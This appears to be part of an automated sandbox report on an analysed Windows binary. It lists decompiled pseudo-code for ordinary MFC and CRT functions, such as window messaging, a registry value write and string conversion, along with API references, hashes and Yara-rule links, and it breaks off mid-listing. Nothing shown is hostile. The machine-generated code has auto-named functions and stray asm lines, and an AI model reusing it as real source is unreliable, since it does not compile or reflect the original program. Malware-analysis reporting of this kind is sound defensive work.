windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004129EB(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v20;
				struct HWND__* _t17;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t28 = __edx;
				_t26 = __ecx;
				_t33 = __ecx;
				_push(__edi);
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					_t26 = __ecx;
					 *((intOrPtr*)( *__ecx + 0x170))();
				}
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E0041176E(0, _t26, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t27 = _t33;
				_t34 = E00412138(_t27, _t28, SendMessageA);
				if(_t34 != 0) {
					SendMessageA( *(_t34 + 0x20), 0x1f, 0, 0);
					E0041176E(0, _t27, _t28,  *(_t34 + 0x20), 0x1f, 0, 0, 1, 1);
					_t17 = GetCapture();
					if(_t17 != 0) {
						_t17 = SendMessageA(_t17, 0x1f, 0, 0);
					}
					return _t17;
				} else {
					_push(_t27);
					_t7 =  &_v20; // 0x44e938
					_v20 = 0x44e9d0;
					E00429326(_t7, 0x448990);
					asm("int3");
					_t20 = _t27;
					 *((intOrPtr*)(_t20 + 4)) = 1;
					return _t20;
				}
			}

APIs

SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00412A15
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00412A40

Part of subcall function 0041176E: GetTopWindow.USER32(?), ref: 0041177C

GetCapture.USER32 ref: 00412A52
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00412A61

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CaptureWindow
String ID:
API String ID: 729421689-0
Opcode ID: bf753591ba1ccfb7c80f72f7c28a9709545013a34ef483cba670ce9c11f68047
Instruction ID: 61ae6b1a3acacbbcba607ac23b67b764360fef80429002832345ad31330dcf4c
Opcode Fuzzy Hash: bf753591ba1ccfb7c80f72f7c28a9709545013a34ef483cba670ce9c11f68047
Instruction Fuzzy Hash: 50018F713502197FFA302B208DC9FFB36ADFF48B88F010539F381AA1E2CA955C509A24

Uniqueness

Uniqueness Score: -1.00%

Function 00416A29, Relevance: 6.1, APIs: 4, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00416A29(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x44f5d0; // 0x8e7de579
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E004276EB( &_v24, 0x10, "%d", _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E004169E3(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E0042569C(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 00416A62
RegCloseKey.ADVAPI32(00000000), ref: 00416A6B
_swprintf.LIBCMT ref: 00416A88
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00416A99

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: fc93939a6b91339be01e6fdb81c27ce67dbd4525534cd9702f361351fb3cfd11
Instruction ID: 1ae63901b30b5ac98aa2f3c0d4395abd995b51cb351bb439d2b44a4c400a6120
Opcode Fuzzy Hash: fc93939a6b91339be01e6fdb81c27ce67dbd4525534cd9702f361351fb3cfd11
Instruction Fuzzy Hash: 9A01D272A00309BBDB10DF689D45FBF73BCAF09B08F11042ABA01E7141DA78ED0587A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041B9C0, Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041B9C0(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, RECT* _a8, int _a12) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t35;

				_t35 = _a4;
				E0040E6CB( &_v12, __eflags,  *((intOrPtr*)(_t35 - 0xb0)));
				if(_a8 != 0) {
					IntersectRect( &_v28, _a8, _t35 - 0x9c);
					EqualRect( &_v28, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v28) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t35 - 0xac)) + 0x20)) + 0x20),  &_v28, _a12);
				}
				if(_v8 != 0) {
					_push(_v12);
					_push(0);
					E0040DF8F();
				}
				return 0;
			}

APIs

IntersectRect.USER32 ref: 0041B9FF
EqualRect.USER32 ref: 0041BA0C
IsRectEmpty.USER32(?), ref: 0041BA16
InvalidateRect.USER32(?,?,?), ref: 0041BA33

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$EmptyEqualIntersectInvalidate
String ID:
API String ID: 3354205298-0
Opcode ID: f85ff242f65f50916ce2324d12660bed923c07894f4a96194953166024e75dbd
Instruction ID: 621094d138bfd5d8e9ffd997e008beb84c9a1060c2a417ba5408c893d9d79013
Opcode Fuzzy Hash: f85ff242f65f50916ce2324d12660bed923c07894f4a96194953166024e75dbd
Instruction Fuzzy Hash: 1C11187290021AEFCF01DF95D889EDEBBB9FF14305F004062FA05A7151D3359A968FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00421058, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00421058(void* __ecx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				void* _t11;
				int _t13;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t34;
				void* _t35;

				_push(__ecx);
				_t23 = __ecx;
				_t9 = E0040A3C7(__eflags, 0x10);
				_t37 = _t9;
				if(_t9 == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E0042103B(_t9, _t37);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t34 = _t32;
				if(_t13 == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E004223EF(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}

APIs

Part of subcall function 0040A3C7: _malloc.LIBCMT ref: 0040A3E1

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 0042108A
GetCurrentProcess.KERNEL32(?,00000000), ref: 00421090
DuplicateHandle.KERNEL32(00000000), ref: 00421093
GetLastError.KERNEL32(?), ref: 004210AE

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: 3001ec32658d2118e8f050b3ca47a5352fbe3cbfc67b51ea32acf34abcb294b1
Instruction ID: 6b148a983b61da440491e10ff45ef86759a416b9c56171b25e27b92fa1848639
Opcode Fuzzy Hash: 3001ec32658d2118e8f050b3ca47a5352fbe3cbfc67b51ea32acf34abcb294b1
Instruction Fuzzy Hash: 7501D431B00210ABDB109BB6EC89F1B7BA9EF84754F144066F905CB251DA75DC41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDBC, Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040CDBC(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* _t16;
				int _t17;
				int _t18;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					if( *((intOrPtr*)(__ecx + 0x14)) == 0) {
						L3:
						_t17 = E00415838(_t25);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					if(_a4 == 0) {
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						if(GetFocus() ==  *(_t33 + 0x20)) {
							SendMessageA( *(E00410E42(0, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E00415A8F( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}

APIs

EnableMenuItem.USER32 ref: 0040CDF4

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

GetFocus.USER32 ref: 0040CE0B
GetParent.USER32(?), ref: 0040CE19
SendMessageA.USER32(?,00000028,00000000,00000000), ref: 0040CE2C

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: EnableException@8FocusItemMenuMessageParentSendThrow
String ID:
API String ID: 4211600527-0
Opcode ID: 2772bf25f4ab90aceb57b13df30727eadadaefee4421662e148a64b8d13d8155
Instruction ID: 750e2516e64fc4909a352d3e2dc9ccd1161e051e180a7bd7097371a334fa1d29
Opcode Fuzzy Hash: 2772bf25f4ab90aceb57b13df30727eadadaefee4421662e148a64b8d13d8155
Instruction Fuzzy Hash: 4C115E71500600EFCB20AF20DCC886BB7BAFF943157148B3EF146629A1C774AC55CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041176E, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0041176E(void* __ebx, void* __ecx, void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				struct HWND__* _t26;

				_t24 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t25 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t26 = _t16;
					if(_t26 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t26, _a8, _a12, _a16);
					} else {
						_t20 = E00410E69(_t22, _t24, _t25, _t26, __eflags, _t26);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E00411493(_t22, _t25, _t26, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t26);
						__eflags = _t18;
						if(_t18 != 0) {
							E0041176E(_t22, _t23, _t24, _t26, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t26, 2);
				}
				return _t16;
			}

APIs

GetTopWindow.USER32(?), ref: 0041177C
GetTopWindow.USER32(00000000), ref: 004117BB
GetWindow.USER32(00000000,00000002), ref: 004117D9

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 9c7bbe8dd5b5794797cb38c513ce080931845729213d45fadcda55efb9624ec7
Instruction ID: 4dbeb012b4611ec7f843cae1e26a0394b9dc57c9159cc82a6f74d7eea3c5799b
Opcode Fuzzy Hash: 9c7bbe8dd5b5794797cb38c513ce080931845729213d45fadcda55efb9624ec7
Instruction Fuzzy Hash: 3C01003240011ABBCF126F519C04EDF3B26BF09354F044026FE25512B0C73AC9B1EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041112D, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041112D(void* __ebx, void* __ecx, void* __edx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;
				void* _t19;

				_t15 = __edx;
				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t16 = GetTopWindow;
				_t17 = _t9;
				if(_t17 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t18 = _t10;
						__eflags = _t18;
						if(_t18 == 0) {
							goto L10;
						}
						_t10 = E0041112D(_t13, _t14, _t15, _t18, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t18, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t17) == 0) {
						L3:
						_push(_t17);
						if(_a12 == 0) {
							return E00410E42(_t13, _t19);
						}
						_t10 = E00410E69(_t13, _t15, _t16, _t17, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E0041112D(__ebx, _t14, _t15, _t17, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

APIs

GetDlgItem.USER32 ref: 00411138
GetTopWindow.USER32(00000000), ref: 0041114B

Part of subcall function 0041112D: GetWindow.USER32(00000000,00000002), ref: 00411192

GetTopWindow.USER32(?), ref: 0041117B

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 984102cd6510390dc055500a7a971ef5f01235c015507f8d9f453651f7a45130
Instruction ID: 4f067f629f0563ab63cea53ecb5b6a740d5673adde4b126f2854eac85ffb1f17
Opcode Fuzzy Hash: 984102cd6510390dc055500a7a971ef5f01235c015507f8d9f453651f7a45130
Instruction Fuzzy Hash: 2F014F3250162EB7CF222B62DC00AEFBB19AF583A4F004026FF2495230D779C99196A9

Uniqueness

Uniqueness Score: -1.00%

Function 0043325A, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043325A(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00432B57(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00432C43(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00433162(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E004330A9(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

APIs

__cftof_l.LIBCMT ref: 0043327E

Part of subcall function 004330A9: __fltout2.LIBCMT ref: 004330D3

__cftog_l.LIBCMT ref: 004332A4
__cftoe_l.LIBCMT ref: 004332D6

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: ceb1fda13dc4798c48014f9535719efa93e0cb76fac7c7f9c2fc7a06ad8d816c
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: EF017E3640014ABBCF125E84CC118EF3F22BF1D356F589456FE1859171C33ACAB2AB85

Uniqueness

Uniqueness Score: -1.00%

Function 0042284E, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0042284E(short* _a4) {
				char* _v0;
				int _v8;
				int _v16;
				void* __ecx;
				void* __ebp;
				int _t6;
				char* _t7;
				void* _t12;
				char* _t13;
				void* _t15;
				void* _t16;
				short* _t20;

				_t20 = _a4;
				if(_t20 != 0) {
					__imp__#7(_t20, _t16, _t12);
					_v8 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_t13 = _t7;
					if(_t13 == 0) {
						E00415804(_t15);
					}
					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
					return _t13;
				}
				return 0;
			}

0x00422850
0x00422859
0x00422862
0x00422876
0x0042287a
0x0042287e
0x00422882
0x00422888
0x0042288c
0x0042288e
0x0042288e
0x004228a1
0x00000000
0x004228a6
0x00000000

APIs

SysStringLen.OLEAUT32(?), ref: 00422862
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,00422F38,00000000,00000018,0042327E), ref: 0042287A
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 00422882
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,00422F38,00000000,00000018,0042327E), ref: 004228A1

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: ec344b905e45cd29d1ffbf7cebc4fec40b6d58e505551a2f193d41dbca85e95f
Instruction ID: 77ba6b3627eb304fb051c5f1923cefdcb469fa3daa648be2e60065ef3e2b6957
Opcode Fuzzy Hash: ec344b905e45cd29d1ffbf7cebc4fec40b6d58e505551a2f193d41dbca85e95f
Instruction Fuzzy Hash: 9CF012716062347F932127A6AC4CCABBE9CEE9A2B4B11062AF54992110D665D811C7F9

Uniqueness

Uniqueness Score: -1.00%

Function 0042D86B, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0042D86B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x44a900);
				E00428FAC(__ebx, __edi, __esi);
				_t31 = E0042AA34(__ebx, _t35);
				_t15 =  *0x44fbf4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0042E21D(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x44faf8; // 0xf912a8
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x44f6d0;
								if(__eflags != 0) {
									_push(_t33);
									E00426256(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x44faf8; // 0xf912a8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x44faf8; // 0xf912a8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0042D906();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E004272E4(_t29, 0x20);
				}
				return E00428FF1(_t33);
			}

APIs

Part of subcall function 0042AA34: __getptd_noexit.LIBCMT ref: 0042AA35
Part of subcall function 0042AA34: __amsg_exit.LIBCMT ref: 0042AA42

__amsg_exit.LIBCMT ref: 0042D897
__lock.LIBCMT ref: 0042D8A7
InterlockedDecrement.KERNEL32(?), ref: 0042D8C4
InterlockedIncrement.KERNEL32(00F912A8), ref: 0042D8EF

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: 11681082ec71b3008c1fa6ecdd761bffd23ddb1e718b116315f4d8017d510659
Instruction ID: 35052adc742c85db714840b182debaf6bc5b825d7df739bf827e39322e341558
Opcode Fuzzy Hash: 11681082ec71b3008c1fa6ecdd761bffd23ddb1e718b116315f4d8017d510659
Instruction Fuzzy Hash: 80018E31F01731DBDB20BB65B405B5A7360AF05724F95006BF824A7690CB2C6981CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 100154CD, Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E100154CD(void* __ecx) {
				intOrPtr _t13;
				intOrPtr* _t14;
				intOrPtr _t19;
				signed int _t25;
				void* _t27;

				_t13 = E100158AC(E1001A502, _t27);
				_push(__ecx);
				_push(0x4098);
				L10015806();
				_t19 = _t13;
				 *((intOrPtr*)(_t27 - 0x10)) = _t19;
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				if(_t19 == 0) {
					_t25 = 0;
					__eflags = 0;
				} else {
					_t25 = E10015737(_t19,  *((intOrPtr*)(_t27 + 0x14)));
				}
				 *(_t27 - 4) =  *(_t27 - 4) | 0xffffffff;
				_t14 = E1001439F(_t25,  *((intOrPtr*)(_t27 + 8)),  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)));
				 *0x100275cc = _t14;
				if(_t14 == 0) {
					_push(8);
					L10015806();
					 *_t14 = 2;
					 *((intOrPtr*)(_t14 + 4)) = _t25;
				} else {
					_t32 = _t25;
					if(_t25 != 0) {
						E10015795(_t25, _t32, 1);
					}
					_t14 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return _t14;
			}

0x100154d2
0x100154d7
0x100154d9
0x100154de
0x100154e4
0x100154e6
0x100154e9
0x100154ef
0x100154fd
0x100154fd
0x100154f1
0x100154f9
0x100154f9
0x10015502
0x1001550e
0x10015515
0x1001551a
0x1001552d
0x1001552f
0x10015535
0x1001553b
0x1001551c
0x1001551c
0x1001551e
0x10015524
0x10015524
0x10015529
0x10015529
0x10015542
0x1001554a

APIs

__EH_prolog.LIBCMT ref: 100154D2
#823.MFC42(00004098,?,?,1001555D,?,00000000,00000001,?), ref: 100154DE
Mailbox.LIBCMT ref: 10015524

